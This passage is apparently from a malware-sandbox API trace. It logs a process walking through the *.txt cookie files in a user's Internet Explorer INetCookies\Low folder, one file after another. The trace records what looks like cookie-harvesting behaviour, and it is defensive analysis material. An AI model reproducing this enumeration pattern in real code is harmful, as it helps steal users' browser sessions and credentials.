[0251.436] PathCombineW (in: pszDest=0x79cf058, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="RQK5QF4L.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\RQK5QF4L.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\RQK5QF4L.txt" [0251.436] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.436] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.436] lstrlenW (lpString="RTEPN67M.txt") returned 12 [0251.436] lstrlenW (lpString="*.txt") returned 5 [0251.437] wcscpy (in: _Dest=0x79cf7c8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.437] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff2005c) returned 0x0 [0251.437] PathCombineW (in: pszDest=0x79cf7c8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="RTEPN67M.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\RTEPN67M.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\RTEPN67M.txt" [0251.437] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.437] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.437] lstrlenW (lpString="RYK7X1K4.txt") returned 12 [0251.437] lstrlenW (lpString="*.txt") returned 5 [0251.437] wcscpy (in: _Dest=0x79cf498, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.437] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff2005c) returned 0x0 [0251.437] PathCombineW (in: pszDest=0x79cf498, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="RYK7X1K4.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\RYK7X1K4.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\RYK7X1K4.txt" [0251.437] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.437] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.437] lstrlenW (lpString="S0EK69P5.txt") returned 12 [0251.437] lstrlenW (lpString="*.txt") returned 5 [0251.437] wcscpy (in: _Dest=0x79cf388, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.437] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff2005c) returned 0x0 [0251.437] PathCombineW (in: pszDest=0x79cf388, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="S0EK69P5.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\S0EK69P5.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\S0EK69P5.txt" [0251.437] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.437] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.437] lstrlenW (lpString="SEVCUJM3.txt") returned 12 [0251.437] lstrlenW (lpString="*.txt") returned 5 [0251.437] wcscpy (in: _Dest=0x79cf6b8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.437] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff2005c) returned 0x0 [0251.437] PathCombineW (in: pszDest=0x79cf6b8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="SEVCUJM3.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\SEVCUJM3.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\SEVCUJM3.txt" [0251.437] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.437] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.437] lstrlenW (lpString="STGOZ493.txt") returned 12 [0251.437] lstrlenW (lpString="*.txt") returned 5 [0251.438] wcscpy (in: _Dest=0x79cef48, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.438] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff2005c) returned 0x0 [0251.438] PathCombineW (in: pszDest=0x79cef48, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="STGOZ493.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\STGOZ493.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\STGOZ493.txt" [0251.438] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.438] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.438] lstrlenW (lpString="T1LCPPSA.txt") returned 12 [0251.438] lstrlenW (lpString="*.txt") returned 5 [0251.438] wcscpy (in: _Dest=0x79ce4a8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.438] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.438] PathCombineW (in: pszDest=0x79ce4a8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="T1LCPPSA.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\T1LCPPSA.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\T1LCPPSA.txt" [0251.438] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.438] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.438] lstrlenW (lpString="TCXQPY9L.txt") returned 12 [0251.438] lstrlenW (lpString="*.txt") returned 5 [0251.438] wcscpy (in: _Dest=0x79ce5b8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.438] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.438] PathCombineW (in: pszDest=0x79ce5b8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="TCXQPY9L.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\TCXQPY9L.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\TCXQPY9L.txt" [0251.438] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.438] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.438] lstrlenW (lpString="TEW946CI.txt") returned 12 [0251.438] lstrlenW (lpString="*.txt") returned 5 [0251.438] wcscpy (in: _Dest=0x79ce8e8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.438] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff2005c) returned 0x0 [0251.438] PathCombineW (in: pszDest=0x79ce8e8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="TEW946CI.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\TEW946CI.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\TEW946CI.txt" [0251.438] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.438] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.438] lstrlenW (lpString="TFCJHLEI.txt") returned 12 [0251.438] lstrlenW (lpString="*.txt") returned 5 [0251.439] wcscpy (in: _Dest=0x79cf168, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.439] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff2005c) returned 0x0 [0251.439] PathCombineW (in: pszDest=0x79cf168, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="TFCJHLEI.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\TFCJHLEI.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\TFCJHLEI.txt" [0251.439] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.439] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.439] lstrlenW (lpString="U2OYIS47.txt") returned 12 [0251.439] lstrlenW (lpString="*.txt") returned 5 [0251.439] wcscpy (in: _Dest=0x79cf278, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.439] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff2005c) returned 0x0 [0251.439] PathCombineW (in: pszDest=0x79cf278, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="U2OYIS47.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\U2OYIS47.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\U2OYIS47.txt" [0251.439] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.439] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.439] lstrlenW (lpString="U8FCPAKJ.txt") returned 12 [0251.439] lstrlenW (lpString="*.txt") returned 5 [0251.439] wcscpy (in: _Dest=0x79cf8d8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.439] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff2005c) returned 0x0 [0251.439] PathCombineW (in: pszDest=0x79cf8d8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="U8FCPAKJ.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\U8FCPAKJ.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\U8FCPAKJ.txt" [0251.439] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.439] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.439] lstrlenW (lpString="UBUPNOZC.txt") returned 12 [0251.439] lstrlenW (lpString="*.txt") returned 5 [0251.439] wcscpy (in: _Dest=0x79cf5a8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.439] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff2005c) returned 0x0 [0251.439] PathCombineW (in: pszDest=0x79cf5a8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="UBUPNOZC.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\UBUPNOZC.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\UBUPNOZC.txt" [0251.439] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.439] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.439] lstrlenW (lpString="UBXQG39X.txt") returned 12 [0251.439] lstrlenW (lpString="*.txt") returned 5 [0251.439] wcscpy (in: _Dest=0x79cf9e8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.440] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff2005c) returned 0x0 [0251.440] PathCombineW (in: pszDest=0x79cf9e8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="UBXQG39X.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\UBXQG39X.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\UBXQG39X.txt" [0251.440] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.440] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.440] lstrlenW (lpString="UGL14QS0.txt") returned 12 [0251.440] lstrlenW (lpString="*.txt") returned 5 [0251.440] wcscpy (in: _Dest=0x79cfaf8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.440] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff2005c) returned 0x0 [0251.440] PathCombineW (in: pszDest=0x79cfaf8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="UGL14QS0.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\UGL14QS0.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\UGL14QS0.txt" [0251.440] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.440] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.440] lstrlenW (lpString="UUEVXDWP.txt") returned 12 [0251.440] lstrlenW (lpString="*.txt") returned 5 [0251.440] wcscpy (in: _Dest=0x79ce288, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.440] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.440] PathCombineW (in: pszDest=0x79ce288, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="UUEVXDWP.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\UUEVXDWP.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\UUEVXDWP.txt" [0251.440] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.440] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.440] lstrlenW (lpString="V7NNCJHO.txt") returned 12 [0251.440] lstrlenW (lpString="*.txt") returned 5 [0251.440] wcscpy (in: _Dest=0x79cfc08, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.440] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff2005c) returned 0x0 [0251.440] PathCombineW (in: pszDest=0x79cfc08, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="V7NNCJHO.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\V7NNCJHO.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\V7NNCJHO.txt" [0251.440] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.440] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.440] lstrlenW (lpString="VD3GM2DA.txt") returned 12 [0251.440] lstrlenW (lpString="*.txt") returned 5 [0251.441] wcscpy (in: _Dest=0x79cfe28, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.441] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff2005c) returned 0x0 [0251.441] PathCombineW (in: pszDest=0x79cfe28, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="VD3GM2DA.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\VD3GM2DA.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\VD3GM2DA.txt" [0251.441] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.441] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.441] lstrlenW (lpString="WPEXKTDV.txt") returned 12 [0251.441] lstrlenW (lpString="*.txt") returned 5 [0251.441] wcscpy (in: _Dest=0x79ced28, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.441] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff2005c) returned 0x0 [0251.441] PathCombineW (in: pszDest=0x79ced28, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="WPEXKTDV.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\WPEXKTDV.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\WPEXKTDV.txt" [0251.441] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.441] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.441] lstrlenW (lpString="WUT8M1Q8.txt") returned 12 [0251.441] lstrlenW (lpString="*.txt") returned 5 [0251.441] wcscpy (in: _Dest=0x79cff38, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.441] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff2005c) returned 0x0 [0251.441] PathCombineW (in: pszDest=0x79cff38, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="WUT8M1Q8.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\WUT8M1Q8.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\WUT8M1Q8.txt" [0251.441] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.441] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.441] lstrlenW (lpString="WX75TEOR.txt") returned 12 [0251.441] lstrlenW (lpString="*.txt") returned 5 [0251.441] wcscpy (in: _Dest=0x79ce398, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.441] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.441] PathCombineW (in: pszDest=0x79ce398, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="WX75TEOR.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\WX75TEOR.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\WX75TEOR.txt" [0251.441] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.441] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.441] lstrlenW (lpString="XRS5D0N2.txt") returned 12 [0251.441] lstrlenW (lpString="*.txt") returned 5 [0251.441] wcscpy (in: _Dest=0x79ce6c8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.442] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff2005c) returned 0x0 [0251.442] PathCombineW (in: pszDest=0x79ce6c8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="XRS5D0N2.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\XRS5D0N2.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\XRS5D0N2.txt" [0251.442] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.442] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.442] lstrlenW (lpString="XUAUK5R0.txt") returned 12 [0251.442] lstrlenW (lpString="*.txt") returned 5 [0251.442] wcscpy (in: _Dest=0x79ce7d8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.442] StrRChrW 